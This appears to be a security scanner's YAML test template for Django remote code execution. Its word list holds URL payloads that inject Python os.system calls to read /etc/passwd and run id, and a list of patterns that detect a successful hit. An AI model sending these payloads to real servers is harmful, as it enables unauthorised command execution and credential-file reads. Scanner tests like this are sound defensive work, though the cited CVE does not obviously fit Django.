---
id: FRAMEWORK_RCE_DJANGO
info:
  name: "Framework RCE - Django"
  description: "Tests whether Django applications are vulnerable to Remote Code Execution through URL injection."
  details: "This test injects Python code execution payloads into Django-specific URL paths to check if the application executes them, indicating a Remote Code Execution vulnerability."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_DJANGO
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94
  cve:
    - CVE-2021-31805

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
  url:
    extract: urlVar

wordLists:
  # Django-specific URL paths
  djangoPaths:
    - "/api/execute?data=%27;import%20os;os.system(%27cat%20/etc/passwd%27)#"
    - "/api/execute?data=%27;import%20os;os.system(%27id%27)#"
    - "/execute?data=%27;import%20os;os.system(%27cat%20/etc/passwd%27)#"
  
  # Command execution outcomes
  rceOutcomes:
    - "root:*:0:0:"
    - "root:.*:0:0:"
    - "uid=0"
    - "gid=0"
    - "Linux"
    - "Unix"
    - "GNU/Linux"
    - "bin/bash"
    - "bin/sh"
    - "/etc/passwd"
    - "daemon:"
    - "nobody:"
    - "www-data:"
    - "sandbox write test"
    - "Python"
    - "sys.executable"
    - "environ"
    - "cmdline"
    - "hostname"
    - "owned.txt"

execute:
  type: single
  requests:
    - req:
        - modify_url: "${djangoPaths}"
        - modify_method: GET
        - replace_body: '{}'

validate:
  response_code:
    eq: 200
  response_payload:
    or:
      - regex: 'root:.*:0:0:'
      - contains_either: "${rceOutcomes}"
    length:
      gt: 0
